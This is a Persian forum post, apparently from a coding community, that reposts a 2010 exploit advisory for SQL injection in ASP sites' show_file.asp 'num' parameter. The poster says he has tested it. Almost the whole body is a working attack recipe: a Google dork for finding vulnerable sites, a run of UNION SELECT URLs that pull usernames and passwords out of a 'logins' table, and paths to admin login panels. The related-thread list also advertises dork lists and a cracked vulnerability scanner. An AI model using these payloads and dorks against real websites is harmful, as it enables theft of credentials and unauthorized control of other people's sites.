• ¡Welcome to Square Theme!
  • This news are in header template.
  • Please ignore this message.
مهمان عزیز خوش‌آمدید. ورود عضــویت


امتیاز موضوع:
  • 1 رای - 5 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5
Title: ASP Exploitation SQL Injection Vulnerability
حالت موضوعی
#1
این باگ sql injection هست برای سایت های asp.net اینم اکسپلویتش تستش زدم خوب چیزیه یه عرب هم نوشتتش اما چیز خیلی ساده ای هست :-)
کد:
=============================================
ASP Exploitation SQL Injection Vulnerability
=============================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#######################################################################
#
# Exploit Title: [ ASP Exploitation SQL Injection Vulnerability ] ..
#
# Date: [ 2010-06-17 ] ..
#
# Author: [ SUp3r00t - heShAm_HaCkEr ] ..
#
# Version: [ Scripts((asp)) ] ..
#
# Google dork: [ show_file.asp?num= ] ..  
#
# TeaM: [ T.v.T ((http://www.pro1tv.com)) ] ..
#
# From: Saudi Arabia ..
#
# Gr33t's: The Master|Al-Kaser20|T.v.T
#
#category: [SQL Injecti0n] ..
#
#######################################################################

# Exploit :  

http://[site]/path/show_file.asp?num={SQL}  
  
# Analysis:

http://[site]/path/show_file.asp?num=Number  

union select ((Number)) login, ((Number)) from logins  
  
========================================================================

# Like:

http://[site]/path/show_file.asp?num=50

http://[site]/path/show_file.asp?num=50'

http://[site]/path/show_file.asp?num=50 having 1=1

((')) <<<<< Keep the label to show a query site involved ..

(( having 1=1 )) << Yes, this revealed the site involved ..

========================================================================  

# Like:1

http://[site]/path/show_file.asp?num=50 order by 20

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from logins  

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,name,19,20 from logins

union select 1,2,3,4,5,6,7,8,9,10,11,12,password,14,15,16,17,18,19,20 from logins

========================================================================

# Final:

http://[site]/path/show_file.asp?num=-50 union select 1,2,3,4,5,6,7,8,9,10,11,12,password,14,15,16,17,name,19,20 from logins

The source of plaque control:-

http://[site]/path/admin "OR" http://[site]/path/login

cpanel: http://[site]/admin "OR" http://[site]/login

========================================================================

./ Sup3r00t@gmail.com
./ pro1tv.com
گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
 
پاسخ
  


موضوعات مشابه ...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  لیست دورک های جدید برای حمله sql injection Amin_Mansouri 3 45,811 12-30-2012، 11:13 PM
آخرین ارسال: Amin_Mansouri
  sql-injection امیر 10 14,311 06-11-2012، 09:11 AM
آخرین ارسال: parvin
  Acunetix Web Vulnerability Scanner 2011 Crack Amin_Mansouri 3 7,422 12-04-2011، 03:24 PM
آخرین ارسال: Amin_Mansouri
  Joomla Component (Akogallery) Remote SQL Injection Amin_Mansouri 0 4,159 08-30-2011، 12:48 PM
آخرین ارسال: Amin_Mansouri

پرش به انجمن:


Browsing: